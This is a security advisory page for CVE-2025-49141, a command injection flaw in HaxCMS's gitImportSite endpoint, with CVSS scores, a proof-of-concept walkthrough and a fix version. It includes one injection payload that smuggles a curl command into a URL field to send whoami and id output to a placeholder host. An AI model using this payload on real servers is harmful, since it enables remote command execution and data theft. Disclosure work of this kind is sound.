logo

Advisories

Weaknesses

Fixes

Requirements

Compliance

CVE-2025-49141 @haxtheweb/haxcms-nodejs

Package

Manager: npm
Name: @haxtheweb/haxcms-nodejs
Vulnerable Version: >=0 <11.0.3

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H

CVSS v4.0: CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

EPSS: 0.00576 pctl0.67822

Details

HaxCMS-PHP Command Injection Vulnerability ### Summary The 'gitImportSite' functionality obtains a URL string from a POST request and insufficiently validates user input. The ’set_remote’ function later passes this input into ’proc_open’, yielding OS command injection. ### Details The vulnerability exists in the logic of the ’gitImportSite’ function, located in ’Operations.php’. The current implementation only relies on the ’filter_var’ and 'strpos' functions to validate the URL, which is not sufficient to ensure absence of all Bash special characters used for command injection. ![gitImportSite](https://github.com/user-attachments/assets/af9935ef-4735-446d-833f-2c2590ff1508) #### Affected Resources • Operations.php:2103 gitImportSite() • \<domain\>/\<user\>/system/api/gitImportSite ### PoC To replicate this vulnerability, authenticate and send a POST request to the 'gitImportSite' endpoint with a crafted URL in the JSON data. Note, a valid token needs to be obtained by capturing a request to another API endpoint (such as 'archiveSite'). 1. Start a webserver. ![webserver](https://github.com/user-attachments/assets/8594f9b1-67fa-4352-bbc3-310bb164ec9b) 2. Initiate a request to the ’archiveSite’ endpoint. ![archiveSite](https://github.com/user-attachments/assets/08503f36-d984-4d53-8fe6-577ad78d5eb7) 3. Capture and modify the request in BurpSuite. ![request-modification](https://github.com/user-attachments/assets/61cd211e-afd3-453e-b86b-58bccffaf824) 4. Observe command output in the HTTP request from the server. ![command-output](https://github.com/user-attachments/assets/35f32274-b709-41d5-adaa-bea48f5cf33c) #### Command Injection Payload ```Bash http://<IP>/.git;curl${IFS}<IP>/$(whoami)/$(id)#=abcdef ``` ### Impact An authenticated attacker can craft a URL string that bypasses the validation checks employed by the ’filter_var’ and ’strpos’ functions in order to execute arbitrary OS commands on the backend server. The attacker can exfiltrate command output via an HTTP request.

Metadata

Created: 2025-06-09T20:30:34Z
Modified: 2025-06-20T17:24:48Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-g4cf-pp4x-hqgw/GHSA-g4cf-pp4x-hqgw.json
CWE IDs: ["CWE-78"]
Alternative ID: GHSA-g4cf-pp4x-hqgw
Finding: F404
Auto approve: 1